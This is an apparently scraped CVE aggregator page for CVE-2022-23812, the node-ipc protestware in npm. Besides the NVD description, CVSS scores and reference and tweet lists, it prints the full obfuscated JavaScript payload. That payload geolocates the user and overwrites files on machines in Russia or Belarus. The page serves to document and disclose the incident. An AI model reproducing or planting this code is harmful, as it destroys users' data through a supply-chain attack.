CVE-2022-23812

Description from NVD

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

Information Acquisition Date:2022-03-31T16:40Z
CVSS 2.0: 10.0 HIGH CVSS 3.x: 9.8 CRITICAL

▼ CVSS3 Vec CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

▼ CVSS2 Vec AV:N/AC:L/Au:N/C:C/I:C/A:C

NVD References

 N/A
     source:CONFIRM
     tags:Patch    Third Party Advisory    
 N/A
     source:CONFIRM
     tags:Issue Tracking    Patch    Third Party Advisory    
 N/A
     source:CONFIRM
     tags:Exploit    Patch    Third Party Advisory    
 N/A
     source:CONFIRM
     tags:Issue Tracking    Patch    Third Party Advisory    
 N/A
     source:CONFIRM
     tags:Third Party Advisory    

Refer to Information on External Sites

CVE InfomationExploits or more Infomation
mitreEXPLOIT DATABASE
NVD0day.today
vulmon.comgithub
CVE DetailsTwitter
JVN ENG JPN
Reconshell

Software Tag:

List of frequently cited URLs

URLNum of Times Referred to
http://patrowl.io205
https://cvetrends.com48
https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-pac...5
https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc...5
https://qiita.com/SnykSec/items/6e75bd78b4deb33715504
https://security.snyk.io/vuln/SNYK-JS-NODEIPC-24263704
https://github.com/RIAEvangelist3
https://twitter.com/abstract_artem/status/15047608098257510573
https://b.hatena.ne.jp/entry/s/qiita.com/SnykSec/items/6e75...3

Information from Twitter

User URL Info Source Date
shimakazetyan https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23812 Source shimakazetyan    1618651347745918977 2023/01/27
threatintelctr https://nvd.nist.gov/vuln/detail/CVE-2022-23812 Source threatintelctr   1631013169446486016 2023/03/02
threatintelctr https://nvd.nist.gov/vuln/detail/CVE-2022-23812 Source threatintelctr   1631836080201760768 2023/03/04
WolfgangSesin http://www.sesin.at Source WolfgangSesin    1632629808529039360 2023/03/06
WolfgangSesin https://www.sesin.at/2023/03/06/cve-2022-23812-node-ipc Source WolfgangSesin    1632629808529039360 2023/03/06
www_sesin_at http://www.sesin.at Source www_sesin_at     1632629810601119745 2023/03/06
www_sesin_at https://www.sesin.at/2023/03/06/cve-2022-23812-node-ipc Source www_sesin_at     1632629810601119745 2023/03/06

List of frequently cited URLs

URLNum of Times Referred to
patrowl.io205
cvetrends.com48
snyk.io5
gist.github.com5
qiita.com4
security.snyk.io4
github.com3
twitter.com3
b.hatena.ne.jp3

Information from Twitter

User URL Info Source
shimakazetyan cve.mitre.org Show Tweet
threatintelctr nvd.nist.gov Show Tweet
threatintelctr nvd.nist.gov Show Tweet
WolfgangSesin sesin.at Show Tweet
WolfgangSesin sesin.at Show Tweet
www_sesin_at sesin.at Show Tweet
www_sesin_at sesin.at Show Tweet
GitHub Search Results: Up to 10
NameURL
scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812
GitHub Search Results: Up to 10
NameURL
scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 github.com
2023/03/06 Score : 0
Added Har-sia Database : 2022/03/17
Last Modified : 2023/03/06
Highest Scored Date : 2022/03/18
Highest Score : 56